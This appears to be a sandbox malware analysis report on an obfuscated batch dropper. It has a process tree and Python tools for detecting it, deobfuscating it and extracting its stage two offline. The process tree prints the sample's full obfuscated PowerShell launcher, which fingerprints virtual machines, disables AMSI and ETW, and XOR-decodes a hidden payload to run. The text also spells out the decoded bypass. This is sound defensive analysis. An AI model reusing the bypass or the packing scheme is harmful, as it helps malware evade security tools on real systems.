Analysis
max time kernel: 118s
max time network: 119s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 01-12-2024 23:25
Static task: static1
Behavioral task: behavioral1
  Sample: R8GHS_Client-built.exe_obf.bat
  Resource: win7-20240903-en
General
Target: R8GHS_Client-built.exe_obf.bat
Size: 4.8MB
MD5: 0ea9a510475daf6eb6499a876dade6c2
SHA1: 6b2414fc97ff2aa43a561d3110ec3e5017ca87ec
SHA256: fdfd4e8e4eb78853bf8bbdcdf575b30009608d295e1ab972f8f4fc9e002ad1db
SHA512: b94b96765df14ee5ca7617f98b2e5750ad361193f435c7d9e0a6c9f7a775cfd70c7960c522a055d69125652ce070c2281e29ccd120b00d5748c5aa4587ea494a
SSDEEP: 49152:6xA1np9ExTwHISa8/DNhtJJMJYz4xkFjyfgxLHRvs24CJMBDU78RH:k
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell 3 IoCs
Processes:
  pid   process
  3024  powershell.exe
  2724  powershell.exe
  2844  powershell.exe
Delays execution with timeout.exe 1 IoCs
Processes:
  pid   process
  3048  timeout.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
  pid   process
  2112  powershell.exe
  2724  powershell.exe
  2844  powershell.exe
  3024  powershell.exe
  2584  powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes (description, pid, process):
  2112  powershell.exe  Token: SeDebugPrivilege
  2372  WMIC.exe        Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35 (this set of 20 tokens is reported twice: 40 rows)
  2724  powershell.exe  Token: SeDebugPrivilege
  2432  WMIC.exe        Token: the same 20 tokens as for 2372, followed by SeIncreaseQuotaPrivilege and SeSecurityPrivilege once more (22 rows)

Suspicious use of WriteProcessMemory 60 IoCs
Processes (description, pid, process, procid_target; each of the 20 rows below is reported three times in the original table):
  PID 3008 wrote to memory of 2112  3008  cmd.exe         31
  PID 2112 wrote to memory of 2372  2112  powershell.exe  32
  PID 3008 wrote to memory of 2724  3008  cmd.exe         34
  PID 3008 wrote to memory of 584   3008  cmd.exe         35
  PID 584 wrote to memory of 2432   584   cmd.exe         36
  PID 3008 wrote to memory of 2828  3008  cmd.exe         37
  PID 2828 wrote to memory of 2848  2828  cmd.exe         38
  PID 3008 wrote to memory of 2844  3008  cmd.exe         39
  PID 3008 wrote to memory of 2652  3008  cmd.exe         40
  PID 2652 wrote to memory of 2600  2652  cmd.exe         42
  PID 3008 wrote to memory of 940   3008  cmd.exe         43
  PID 3008 wrote to memory of 3048  3008  cmd.exe         44
  PID 3008 wrote to memory of 3052  3008  cmd.exe         45
  PID 3008 wrote to memory of 636   3008  cmd.exe         46
  PID 636 wrote to memory of 1112   636   net.exe         47
  PID 3008 wrote to memory of 3024  3008  cmd.exe         48
  PID 3008 wrote to memory of 2584  3008  cmd.exe         49
  PID 3008 wrote to memory of 1608  3008  cmd.exe         50
  PID 3008 wrote to memory of 1964  3008  cmd.exe         51
  PID 3008 wrote to memory of 3012  3008  cmd.exe         52
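The signatures above are the ones the sandbox fired. Several behaviours that are plain in the process tree have no signature on this page: the WMI hardware fingerprinting (diskdrive model, computersystem manufacturer, Win32_ComputerSystem.Model) that kills the parent cmd.exe when a VM string matches, the reflective private-field tamper ([Ref].Assembly.GetType ... GetField ... SetValue), strings built from UTF8.GetString byte arrays and [char] arithmetic chains, backtick-split variable names, the doskey aliasing and the "net session" elevation probe. The Python below is an added example, not part of this report or of the sandbox's rule set: a command-line scanner run over process records constructed from the tree on this page (the PID 3024 record is abridged to its AMSI-tamper prefix with shortened byte arrays). Rule names are this example's own. The point worth taking away is that "amsiInitFailed" never appears literally on the command line, so the rules match the obfuscation primitives rather than the decoded strings.

```python
import re

# Process records (pid, image, command line) constructed from the process tree in this
# report. The PID 3024 line is abridged: byte arrays are shortened and the tail is cut.
PROCESSES = [
    (2112, "powershell.exe", r'''powershell "$KDOT = wmic diskdrive get model;if ($KDOT -like '*ADY HARDDISK*' -or $KDOT -like '*EMU HARDDISK*') { taskkill /f /im cmd.exe }"'''),
    (2724, "powershell.exe", r'''powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"'''),
    (584, "cmd.exe", r"C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value"),
    (636, "net.exe", "net session"),
    (3024, "powershell.exe", r'''powershell -exec bypass -C "$kdot_file='C:\Users\Admin\AppData\Local\Temp\R8GHS_Client-built.exe_obf.bat';$KDoTtPuivxBnJc=([SystEm.texT.enCOdING]::UTF8.getstrING((83, 121, 115, 116)) + [sYSTEM.text.eNCODiNG]::UTf8.getStRiNg((111, 0x6d, 0x61)));$kDoTgrozJIHvzc=([SYStEM.TEXt.ENCoDIng]::uTF8.GETstRinG((0x61, 0x6d, 0x73)));${kdotyn`Wadwihnq}=[REf].AsSembLY.GETtype($kDottpuIvXBNJc);${`Kdot`CcH`WpsQqfu}=${kDo`Tyn`Wadwi`Hnq}.gEtFIElD($kDOtGroZjIHvzc,([SYstem.text.eNCODIng]::UtF8.getStrINg((0x4e, 0x6f))));${`K`DotCc`Hw`P`SqQfU}.sETvAlUe($nuLL,((9999 -eQ 9999)));.([char]((-10822 - 444 + 4792 + 6545))+[char]((2455 - 4731 + 7346 - 4969))+[char](((-21689 -Band 4760) + (-21689 -Bor 4760) + 7967 + 9078)))'''),
    (2584, "powershell.exe", r'''powershell.exe -nop -c "Write-Host -NoNewLine $null"'''),
    (1608, "doskey.exe", "doskey BCDEDIT=CERTUTIL"),
]

# Each rule: a pattern and the minimum number of matches needed for it to fire.
RULES = {
    "wmi_hardware_fingerprint": (re.compile(
        r"wmic\s+(?:diskdrive|computersystem)\s+get|get-wmiobject\s+win32_computersystem", re.I), 1),
    "kills_parent_shell_on_vm": (re.compile(r"taskkill\s+/f\s+/im\s+cmd\.exe", re.I), 1),
    # GetType -> GetField -> SetValue on [Ref].Assembly is how the AMSI/ETW fields get flipped;
    # the field name itself is obfuscated, so do not key on "amsiInitFailed".
    "reflective_private_field_tamper": (re.compile(
        r"\[ref\]\.assembly\.gettype.*?getfield.*?setvalue", re.I | re.S), 1),
    "byte_array_string_building": (re.compile(
        r"utf8\.getstring\(\(\s*(?:\d+|0x[0-9a-f]+)\s*,", re.I), 1),
    "char_arithmetic_obfuscation": (re.compile(r"\[char\]\(", re.I), 3),   # three or more [char]( calls
    "backtick_split_variable": (re.compile(r"\$\{[^}]*`[^}]*\}"), 1),
    "doskey_command_aliasing": (re.compile(r"doskey\s+\w+=\w+", re.I), 1),
    "admin_check_net_session": (re.compile(r"\bnet1?\s+session\b", re.I), 1),  # fails unless elevated
}


def scan(processes):
    """Return {pid: [rule names]} for every record whose command line fires at least one rule."""
    hits = {}
    for pid, _image, cmdline in processes:
        fired = [name for name, (rx, need) in RULES.items() if len(rx.findall(cmdline)) >= need]
        if fired:
            hits[pid] = fired
    return hits


if __name__ == "__main__":
    for pid, names in scan(PROCESSES).items():
        print(pid, ", ".join(names))
```

Run as-is it reports every PID except 2584 (the "Write-Host $null" no-op); feed it the full command lines from a process-creation log (Sysmon event 1 or 4688 with command-line auditing) and the same rules apply unchanged.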
Processes
[depth 1] C:\Windows\system32\cmd.exe (PID 3008)
    cmd /c "C:\Users\Admin\AppData\Local\Temp\R8GHS_Client-built.exe_obf.bat"
    - Suspicious use of WriteProcessMemory

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2112)
      powershell "$KDOT = wmic diskdrive get model;if ($KDOT -like '*ADY HARDDISK*' -or $KDOT -like '*EMU HARDDISK*') { taskkill /f /im cmd.exe }"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [depth 3] C:\Windows\System32\Wbem\WMIC.exe (PID 2372)
        "C:\Windows\System32\Wbem\WMIC.exe" diskdrive get model
        - Suspicious use of AdjustPrivilegeToken

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2724)
      powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  [depth 2] C:\Windows\system32\cmd.exe (PID 584)
      C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
      - Suspicious use of WriteProcessMemory

    [depth 3] C:\Windows\System32\Wbem\WMIC.exe (PID 2432)
        wmic computersystem get manufacturer /value
        - Suspicious use of AdjustPrivilegeToken

  [depth 2] C:\Windows\system32\cmd.exe (PID 2828)
      C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
      - Suspicious use of WriteProcessMemory

    [depth 3] C:\Windows\System32\Wbem\WMIC.exe (PID 2848)
        wmic computersystem get manufacturer /value

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2844)
      powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses

  [depth 2] C:\Windows\system32\cmd.exe (PID 2652)
      C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
      - Suspicious use of WriteProcessMemory

    [depth 3] C:\Windows\System32\Wbem\WMIC.exe (PID 2600)
        wmic computersystem get manufacturer /value

  [depth 2] C:\Windows\system32\chcp.com (PID 940)
      chcp 65001

  [depth 2] C:\Windows\system32\timeout.exe (PID 3048)
      timeout 0
      - Delays execution with timeout.exe

  [depth 2] C:\Windows\system32\wscript.exe (PID 3052)
      wscript /b

  [depth 2] C:\Windows\system32\net.exe (PID 636)
      net session
      - Suspicious use of WriteProcessMemory

    [depth 3] C:\Windows\system32\net1.exe (PID 1112)
        C:\Windows\system32\net1 session

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3024)
      powershell -exec bypass -C "$kdot_file='C:\Users\Admin\AppData\Local\Temp\R8GHS_Client-built.exe_obf.bat';$KDoTtPuivxBnJc=([SystEm.texT.enCOdING]::UTF8.getstrING((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46, 65, 117, 116)) + [sYSTEM.text.eNCODiNG]::UTf8.getStRiNg((111, 0x6d, 0x61, 116, 105, 111, 0x6e, 0x2e, 0x41, 109, 0x73, 0x69, 85, 116, 105, 0x6c, 115)));$kDoTgrozJIHvzc=([SYStEM.TEXt.ENCoDIng]::uTF8.GETstRinG((0x61, 0x6d, 0x73, 0x69, 0x49, 0x6e, 0x69, 0x74, 0x46, 0x61, 0x69, 0x6c, 0x65, 0x64)));${kdotyn`Wadwihnq}=[REf].AsSembLY.GETtype($kDottpuIvXBNJc);${`Kdot`CcH`WpsQqfu}=${kDo`Tyn`Wadwi`Hnq}.gEtFIElD($kDOtGroZjIHvzc,([SYstem.text.eNCODIng]::UtF8.getStrINg((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63))));${`K`DotCc`Hw`P`SqQfU}.sETvAlUe($nuLL,((9999 -eQ 9999)));[ReFLeCtION.asSEmBlY]::LoAdWitHpArTIAlName(([SYsTEm.TEXT.eNcoDINg]::UTf8.geTstRINg((83, 121, 115, 116, 101, 109, 46, 67, 111, 114, 101)))).GetTYPE(([systEm.TeXT.EnCoDINg]::UtF8.GEtstRINg((83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99, 115, 46, 69, 118)) + [SySTEm.tEXT.encodiNG]::UTF8.GETsTrIng((101, 110, 0x74, 0x69, 110, 0x67, 46, 69, 0x76, 101, 0x6e, 0x74, 0x50, 0x72, 111, 0x76, 105, 0x64, 0x65, 114)))).getfIeLd(([SYsTEm.text.eNCOdiNG]::uTF8.getstrINg((0x6d, 0x5f, 0x65, 0x6e)) + [sySTeM.Text.EncODiNg]::UtF8.GEtSTrInG((97, 98, 108)) + [syStem.TeXt.EncOdIng]::uTF8.GeTsTRing((0x65, 0x64))),([sySTem.Text.eNcodINg]::UtF8.GeTstRing([SYstEM.CoNveRT]::FROmBasE64STriNG('Tm9uUHVibGljLEluc3RhbmNl')))).seTValUE([REF].asseMBLy.GetTyPe(([sYStem.text.encOdINg]::UTf8.geTSTRiNG((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46, 65, 117, 116, 111, 109, 97, 116, 105, 111, 110, 46, 84, 114, 97, 99)) + [SySTeM.texT.eNCoDING]::utF8.GeTStRINg((0x69, 110, 0x67, 46, 0x50, 83, 69, 0x74, 119, 76, 111, 103, 80, 0x72, 0x6f, 118, 0x69, 0x64, 0x65, 0x72)))).GEtfIeLD(([SYStEM.tExT.EncOdING]::uTf8.geTStRiNg((101, 0x74, 0x77, 80, 0x72, 111, 0x76, 105, 0x64, 0x65, 0x72))),([SystEm.teXT.EncOdinG]::Utf8.geTsTrinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63)))).getVAluE($null),0);${k`DOttBa`IdXwfe`P}=[CONVert]::fRombaSe64StrING((.([char]((-10822 - 444 + 4792 + 6545))+[char]((2455 - 4731 + 7346 - 4969))+[char](((-21689 -Band 4760) + (-21689 -Bor 4760) + 7967 + 9078))+[char]((13362 - 9970 + 1391 - 4738))+[char]((5188 - 4472 - 5840 + 5191))+[char]((-90 - 4243 - 5330 + 9774))+[char]((3240 - 773 + 150 - 2507))+[char]((2248 - 3603 - 6172 + 7643))+[char](((-1592 -Band 2269) + (-1592 -Bor 2269) + 1951 - 2527))+[char]((6728 - 396 - 8648 + 2426))+[char]((14221 - 2019 - 9923 - 2163))) $kDot_fIle -raw | .([char](((-10102 -Band 9771) + (-10102 -Bor 9771) + 8307 - 7893))+[char]((-5232 - 5714 + 5289 + 5758))+[char](((-21704 -Band 4830) + (-21704 -Bor 4830) + 7332 + 9650))+[char](((-5361 -Band 200) + (-5361 -Bor 200) - 1929 + 7191))+[char]((5796 - 1685 - 2855 - 1157))+[char]((6886 - 3432 - 3062 - 276))+[char]((-8782 - 6695 + 9561 + 5961))+[char]((10338 - 5304 - 9362 + 4411))+[char](((2817 -Band 574) + (2817 -Bor 574) + 6664 - 9939))+[char]((-935 - 4669 + 4701 + 1017))+[char]((14905 - 2821 - 7680 - 4299))+[char](((-20980 -Band 8328) + (-20980 -Bor 8328) + 9978 + 2784))+[char]((1948 - 3900 - 5056 + 7111))) (([sysTEM.TEXt.ENcODING]::uTF8.GeTsTrINg([sySTeM.CONveRT]::fRoMbaSe64STrING('Og=='))) + ([sySTEM.Text.EncODInG]::UtF8.getsTRing([SY STem.CoNVerT]::fRombAse64sTRINg('OktET1Q6OiguKik='))))).MAtchEs.grOUps[1].VAlUE);${KDotDGukzlrZeN}=[sYstEM.tEXt.EnCoDiNg]::Utf8.geTBYtEs(([sYsteM.tEXT.EncOdIng]::UTf8.GeTSTRInG((109, 81, 98, 117, 108, 70, 114, 49, 114, 98, 52, 120, 86, 117, 52, 49))));${kdotcabiZvWzUe}=.([char](((489 -Band 330) + (489 -Bor 330) + 1171 - 1912))+[char](((5256 -Band 2125) + (5256 -Bor 2125) - 4663 - 2617))+[char]((436 - 1047 + 5610 - 4880))+[char](((6007 -Band 1143) + (6007 -Bor 1143) - 3369 - 3736))+[char](((6570 -Band 5861) + (6570 -Bor 5861) - 8832 - 3520))+[char](((-5856 -Band 5287) + (-5856 -Bor 5287) - 5737 + 6404))+[char]((190 - 4849 - 2788 + 7553))+[char]((15595 - 5946 - 3629 - 5919))+[char]((-4101 - 7031 + 6016 + 5215))+[char](((-7556 -Band 3381) + (-7556 -Bor 3381) + 9926 - 5635))) byte[] ${`Kd`Ottb`AIdX`WfeP}.lenGtH;for (${kdOtdGvp`BeC`Mnr}=0; ${kdOt`DGV`Pbe`Cmnr} -lt ${`KDottbAi`DXWfe`P}.lengTH; ${K`DotdG`VpbeCmnr}++) {${kDot`Ca`B`IZvWzue}[${`K`Dot`D`G`VPBeCmnr}]=${kdOttbaidxwfeP}[${kd`OtD`Gvpbe`Cmnr}] -bxor ${kdotDguKzLrZen}[${kd`OtdG`VpbeC`Mnr} % ${Kdotd`GuKzLr`Zen}.leNGTh]};.([char]((22989 - 8254 - 7750 - 6880))+[char](((-3745 -Band 1431) + (-3745 -Bor 1431) - 4880 + 7295))+[char]((14060 - 4791 - 239 - 8910))) ([sySTeM.TEXt.encodIng]::uTf8.geTSTRing(${kdotcabIzvWZue}))"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2584)
      powershell.exe -nop -c "Write-Host -NoNewLine $null"
      - Suspicious behavior: EnumeratesProcesses

  [depth 2] C:\Windows\system32\doskey.exe (PID 1608)
      doskey BCDEDIT=CERTUTIL

  [depth 2] C:\Windows\system32\doskey.exe (PID 1964)
      doskey /listsize=0

  [depth 2] C:\Windows\system32\doskey.exe (PID 3012)
      doskey MD=CERTUTIL
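To read what PID 3024 does, the launcher has to be decoded first. It uses three string primitives: [char] arithmetic chains (where every (a -Band b) + (a -Bor b) pair is just a + b), UTF8.GetString over integer arrays, and base64 literals; variable names are additionally split with backticks and re-cased. The Python below is an added example written for this report, not code from the page or from the sample's author. It evaluates the arithmetic with a restricted AST walker rather than eval() and reduces fragments of the PID 3024 command line, constructed inline from the text above, to readable PowerShell: the [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null, ...) tamper, then Get-Content $kdot_file -raw | Select-String '::KDOT::(.*)', the 16-byte key 'mQbulFr1rb4xVu41', and the final iex.

```python
import ast
import base64
import re

# Fragments of the PID 3024 command line from the process tree above, constructed here
# as sample input: the AMSI field tamper, the Get-Content | Select-String payload
# extraction, the XOR key byte array and the closing iex call.
SAMPLE = (
    "$KDoTtPuivxBnJc=([SystEm.texT.enCOdING]::UTF8.getstrING((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, "
    "97, 103, 101, 109, 101, 110, 116, 46, 65, 117, 116)) + [sYSTEM.text.eNCODiNG]::UTf8.getStRiNg((111, 0x6d, "
    "0x61, 116, 105, 111, 0x6e, 0x2e, 0x41, 109, 0x73, 0x69, 85, 116, 105, 0x6c, 115)));"
    "$kDoTgrozJIHvzc=([SYStEM.TEXt.ENCoDIng]::uTF8.GETstRinG((0x61, 0x6d, 0x73, 0x69, 0x49, 0x6e, 0x69, 0x74, "
    "0x46, 0x61, 0x69, 0x6c, 0x65, 0x64)));${kdotyn`Wadwihnq}=[REf].AsSembLY.GETtype($kDottpuIvXBNJc);"
    "${`Kdot`CcH`WpsQqfu}=${kDo`Tyn`Wadwi`Hnq}.gEtFIElD($kDOtGroZjIHvzc,([SYstem.text.eNCODIng]::UtF8.getStrINg("
    "(0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63))));"
    "${`K`DotCc`Hw`P`SqQfU}.sETvAlUe($nuLL,((9999 -eQ 9999)));"
    "${k`DOttBa`IdXwfe`P}=[CONVert]::fRombaSe64StrING((.([char]((-10822 - 444 + 4792 + 6545))"
    "+[char]((2455 - 4731 + 7346 - 4969))+[char](((-21689 -Band 4760) + (-21689 -Bor 4760) + 7967 + 9078))"
    "+[char]((13362 - 9970 + 1391 - 4738))+[char]((5188 - 4472 - 5840 + 5191))+[char]((-90 - 4243 - 5330 + 9774))"
    "+[char]((3240 - 773 + 150 - 2507))+[char]((2248 - 3603 - 6172 + 7643))"
    "+[char](((-1592 -Band 2269) + (-1592 -Bor 2269) + 1951 - 2527))+[char]((6728 - 396 - 8648 + 2426))"
    "+[char]((14221 - 2019 - 9923 - 2163))) $kDot_fIle -raw | "
    ".([char](((-10102 -Band 9771) + (-10102 -Bor 9771) + 8307 - 7893))+[char]((-5232 - 5714 + 5289 + 5758))"
    "+[char](((-21704 -Band 4830) + (-21704 -Bor 4830) + 7332 + 9650))"
    "+[char](((-5361 -Band 200) + (-5361 -Bor 200) - 1929 + 7191))+[char]((5796 - 1685 - 2855 - 1157))"
    "+[char]((6886 - 3432 - 3062 - 276))+[char]((-8782 - 6695 + 9561 + 5961))+[char]((10338 - 5304 - 9362 + 4411))"
    "+[char](((2817 -Band 574) + (2817 -Bor 574) + 6664 - 9939))+[char]((-935 - 4669 + 4701 + 1017))"
    "+[char]((14905 - 2821 - 7680 - 4299))+[char](((-20980 -Band 8328) + (-20980 -Bor 8328) + 9978 + 2784))"
    "+[char]((1948 - 3900 - 5056 + 7111))) (([sysTEM.TEXt.ENcODING]::uTF8.GeTsTrINg([sySTeM.CONveRT]::"
    "fRoMbaSe64STrING('Og=='))) + ([sySTEM.Text.EncODInG]::UtF8.getsTRing([SYSTem.CoNVerT]::"
    "fRombAse64sTRINg('OktET1Q6OiguKik='))))).MAtchEs.grOUps[1].VAlUE);"
    "${KDotDGukzlrZeN}=[sYstEM.tEXt.EnCoDiNg]::Utf8.geTBYtEs(([sYsteM.tEXT.EncOdIng]::UTf8.GeTSTRInG((109, 81, "
    "98, 117, 108, 70, 114, 49, 114, 98, 52, 120, 86, 117, 52, 49))));"
    ".([char]((22989 - 8254 - 7750 - 6880))+[char](((-3745 -Band 1431) + (-3745 -Bor 1431) - 4880 + 7295))"
    "+[char]((14060 - 4791 - 239 - 8910))) ([sySTeM.TEXt.encodIng]::uTf8.geTSTRing(${kdotcabIzvWZue}))"
)

# Only these node types may appear inside a [char](...) expression; anything else is
# rejected instead of being handed to eval().
_OPS = {ast.Add: int.__add__, ast.Sub: int.__sub__, ast.BitAnd: int.__and__, ast.BitOr: int.__or__}
_CHAR = re.compile(r"\[char\]\(", re.I)
_BYTES = re.compile(r"\[system\.text\.encoding\]::utf8\.getstring\(\(\s*([0-9a-fx,\s]+?)\s*\)\)", re.I)
_B64 = re.compile(r"\[system\.convert\]::frombase64string\('([A-Za-z0-9+/=]+)'\)", re.I)
_GETSTR = re.compile(r"\[system\.text\.encoding\]::utf8\.getstring\(('[^']*')\)", re.I)
_VAR = re.compile(r"\$\{([^}]*)\}|\$([A-Za-z_]\w*)")


def eval_ps_arith(expr: str) -> int:
    """Evaluate a PowerShell integer expression built from + - -band -bor and parentheses."""
    py = re.sub(r"-band", "&", re.sub(r"-bor", "|", expr, flags=re.I), flags=re.I)

    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -walk(node.operand)
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError("unsupported node: " + type(node).__name__)

    return walk(ast.parse(py.strip(), mode="eval"))


def _balanced(text: str, open_idx: int):
    """Return (inner, end) for the parenthesised group whose '(' sits at text[open_idx]."""
    depth = 0
    for i in range(open_idx, len(text)):
        if text[i] == "(":
            depth += 1
        elif text[i] == ")":
            depth -= 1
            if depth == 0:
                return text[open_idx + 1:i], i + 1
    raise ValueError("unbalanced parentheses")


def _lit(s: str) -> str:
    return "'" + s.replace("'", "''") + "'"


def fold_char_chains(text: str) -> str:
    """Replace every [char](expr)+[char](expr)+... run with one single-quoted literal."""
    out, pos = [], 0
    m = _CHAR.search(text, pos)
    while m:
        out.append(text[pos:m.start()])
        run = []
        while m:
            inner, pos = _balanced(text, m.end() - 1)
            run.append(chr(eval_ps_arith(inner)))
            m = _CHAR.match(text, pos + 1) if text.startswith("+", pos) else None
        out.append(_lit("".join(run)))
        m = _CHAR.search(text, pos)
    out.append(text[pos:])
    return "".join(out)


def deobfuscate(script: str) -> str:
    """Reduce the launcher's string primitives to literals and normalise variable names."""
    s = fold_char_chains(script)
    s = _BYTES.sub(lambda m: _lit(bytes(int(t, 0) for t in m.group(1).split(",")).decode()), s)
    s = _B64.sub(lambda m: _lit(base64.b64decode(m.group(1)).decode()), s)
    s = _GETSTR.sub(r"\1", s)
    # Backtick-split, mixed-case spellings all refer to the same (case-insensitive) variable.
    s = _VAR.sub(lambda m: "$" + (m.group(1) or m.group(2)).replace("`", "").lower(), s)
    prev = None
    while prev != s:  # ('lit') -> 'lit' except after the . and & call operators; 'a' + 'b' -> 'ab'
        prev = s
        s = re.sub(r"(?<![.&\w])\(\s*('[^']*')\s*\)", r"\1", s)
        s = re.sub(r"'([^']*)'\s*\+\s*'([^']*)'", r"'\1\2'", s)
    return s


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

The same three reductions applied to the rest of the command line give the ETW half of the tamper: System.Core's System.Diagnostics.Eventing.EventProvider field m_enabled (NonPublic,Instance) is set to 0 on the instance held in System.Management.Automation.Tracing.PSEtwLogProvider.etwProvider, and the New-Object byte[] loop XORs the base64-decoded match against the key before iex runs the result.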
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 875cee5ce5e876d1aa46a2769fad9549
  SHA1: 93a7432a7bb7c391ab0449a8d46ce05743fe4333
  SHA256: 0f697e24a3f54fdebc6462455811bffb0afe90239c3d41ec86d3279d4fb8a91b
  SHA512: d7160614cf571c6d2da1554d6bcb81229b8fb14f8009915c390be82ca7c91a65535c3ed2c5c989364522d17ca251fcdca290eafb1df9039ec8caf91b4ccc0ebe
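With the marker, key and XOR loop known from the PID 3024 launcher, the second stage can be pulled out of the .bat offline instead of letting iex run it on a box whose AMSI and ETW have just been switched off. The Python below is an added example, not the page's own code: extract_stage2 mirrors the launcher's logic (first "::KDOT::" line, base64, repeating-key XOR, UTF-8), and build_sample_bat constructs a stand-in dropper with a harmless payload so the block runs offline (a cmd.exe line beginning with "::" is a label, which is why the blob can sit inside the batch file without ever executing as a command). The key and marker are the ones recovered above; on a real sample pass the file path as the first argument.

```python
import base64
import re
import sys

KEY = b"mQbulFr1rb4xVu41"             # the 16-byte key the launcher builds from a byte array
MARKER = re.compile(r"::KDOT::(.*)")  # the Select-String pattern it applies to the raw .bat text


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, byte for byte; symmetric, so one routine both encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def extract_stage2(bat_text: str, key: bytes = KEY) -> str:
    """Mirror the launcher statically: first ::KDOT:: line -> base64 -> XOR -> UTF-8 text."""
    m = MARKER.search(bat_text)
    if m is None:
        raise ValueError("no ::KDOT:: payload line in this file")
    blob = base64.b64decode(m.group(1).strip(), validate=True)  # strip() drops a trailing \r
    return xor_bytes(blob, key).decode("utf-8")


def build_sample_bat(payload: str, key: bytes = KEY) -> str:
    """Constructed stand-in for the dropper: a launcher stub, then the payload line.
    cmd.exe treats a line beginning with :: as a label, so the blob never runs as a command."""
    blob = base64.b64encode(xor_bytes(payload.encode("utf-8"), key)).decode("ascii")
    return '@echo off\r\npowershell -exec bypass -C "<launcher>"\r\n::KDOT::' + blob + "\r\n"


SAMPLE_PAYLOAD = "Write-Host 'constructed second stage'"  # harmless stand-in for the real next stage


def main(argv):
    if len(argv) > 1:   # real sample: python extract.py R8GHS_Client-built.exe_obf.bat
        with open(argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:               # no argument: round-trip the constructed sample
        text = build_sample_bat(SAMPLE_PAYLOAD)
    print(extract_stage2(text))


if __name__ == "__main__":
    main(sys.argv)
```

Because the launcher reads the file with Get-Content -raw and matches the whole text, the captured group runs to the end of the line and includes the carriage return on CRLF files; the strip() before base64 decoding is what keeps validate=True from rejecting it.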